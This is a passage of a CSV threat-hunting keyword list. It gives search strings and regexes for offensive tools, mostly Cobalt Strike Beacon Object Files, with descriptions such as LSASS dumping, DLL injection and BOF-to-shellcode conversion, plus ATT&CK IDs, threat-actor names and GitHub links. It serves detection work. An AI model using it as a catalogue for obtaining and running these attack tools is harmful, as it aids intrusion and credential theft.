T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*BOF prototype works!*",".{0,1000}BOF\sprototype\sworks!.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*bof*/CredEnum/*",".{0,1000}bof.{0,1000}\/CredEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOF.NET.git*",".{0,1000}BOF\.NET\.git.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOF.NET-main*",".{0,1000}BOF\.NET\-main.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOF/*procdump/*",".{0,1000}BOF\/.{0,1000}procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*bof_allocator*",".{0,1000}bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bof_helper.py*",".{0,1000}bof_helper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","210","46","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*bof_net_user.c*",".{0,1000}bof_net_user\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*bof_net_user.o*",".{0,1000}bof_net_user\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*bof_pack.py *",".{0,1000}bof_pack\.py\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*bof_reuse_memory*",".{0,1000}bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BOF2shellcode*",".{0,1000}BOF2shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*bof2shellcode.py*",".{0,1000}bof2shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOF-DLL-Inject*",".{0,1000}BOF\-DLL\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*bofentry::bof_entry*",".{0,1000}bofentry\:\:bof_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*BOF-ForeignLsass*",".{0,1000}BOF\-ForeignLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*bofhound --*",".{0,1000}bofhound\s\-\-.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound -i *",".{0,1000}bofhound\s\-i\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound -o *",".{0,1000}bofhound\s\-o\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*bofhound-main*",".{0,1000}bofhound\-main.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*BOF-IShellWindows-DCOM.*",".{0,1000}BOF\-IShellWindows\-DCOM\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*BofLdapSignCheck*",".{0,1000}BofLdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*bofloader.bin*",".{0,1000}bofloader\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOFMask-main*",".{0,1000}BOFMask\-main.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*bofnet*SeriousSam.*",".{0,1000}bofnet.{0,1000}SeriousSam\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 